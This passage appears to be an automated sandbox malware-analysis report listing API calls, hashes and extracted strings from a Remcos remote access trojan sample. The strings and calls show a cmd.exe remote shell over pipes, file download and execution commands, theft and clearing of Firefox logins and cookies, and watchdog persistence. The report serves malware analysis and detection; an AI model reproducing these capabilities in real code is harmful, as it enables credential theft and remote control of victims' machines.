                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                  • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                  • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                  • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                  • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: xAG
                                                  • API String ID: 176396367-2759412365
                                                  • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                  • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                  • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                  • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041A959
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID: @
                                                  • API String ID: 1890195054-2766056989
                                                  • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                  • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                  • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                  • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                  APIs
                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                  • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                  • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                  • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                    • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3476068407-0
                                                  • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                  • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                  • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                  • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 0041AC74
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ForegroundText
                                                  • String ID:
                                                  • API String ID: 29597999-0
                                                  • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                  • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                  • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                  • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                  • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                  • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                  • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                  • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                  • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                  • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                    • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                    • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                    • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                    • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                    • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                    • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                  • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                    • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                    • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                    • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                  • Sleep.KERNEL32(000007D0), ref: 00407976
                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                    • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$TTF$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                  • API String ID: 2918587301-184849705
                                                  • Opcode ID: bf041a88920504d7e07c4f2adaaadb24ac1acc8d2845f118f1df0bb96b68a287
                                                  • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                  • Opcode Fuzzy Hash: bf041a88920504d7e07c4f2adaaadb24ac1acc8d2845f118f1df0bb96b68a287
                                                  • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040508E
                                                    • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • __Init_thread_footer.LIBCMT ref: 004050CB
                                                  • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                  • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                    • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                    • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                  • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                  • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                  • CloseHandle.KERNEL32 ref: 004053CD
                                                  • CloseHandle.KERNEL32 ref: 004053D5
                                                  • CloseHandle.KERNEL32 ref: 004053E7
                                                  • CloseHandle.KERNEL32 ref: 004053EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                  • API String ID: 3815868655-81343324
                                                  • Opcode ID: 84996b86ef1c8cd1da7d731bc77a0d73bbb291c078ff52380d4de93547978311
                                                  • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                  • Opcode Fuzzy Hash: 84996b86ef1c8cd1da7d731bc77a0d73bbb291c078ff52380d4de93547978311
                                                  • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                  • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                    • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                  • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                  • String ID: 0DG$Remcos restarted by watchdog!$TTF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                  • API String ID: 65172268-329858390
                                                  • Opcode ID: 13534fb87cbc39d3247b244c893d635fc72677ab580a1e7e2fcadcea4b6fcd11
                                                  • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                  • Opcode Fuzzy Hash: 13534fb87cbc39d3247b244c893d635fc72677ab580a1e7e2fcadcea4b6fcd11
                                                  • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                  • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                  • FindClose.KERNEL32(00000000), ref: 0040B517
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: 8a573f4cde42bb8974b55a1bb9849f05b01946ec243df485f40a07b19650f4e4
                                                  • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                  • Opcode Fuzzy Hash: 8a573f4cde42bb8974b55a1bb9849f05b01946ec243df485f40a07b19650f4e4
                                                  • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                  • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                  • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                  • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: e3298efea2014f122d9e4da4ca7a52805c3aaa742dc7125d16785d6f153ddc68
                                                  • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                  • Opcode Fuzzy Hash: e3298efea2014f122d9e4da4ca7a52805c3aaa742dc7125d16785d6f153ddc68
                                                  • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
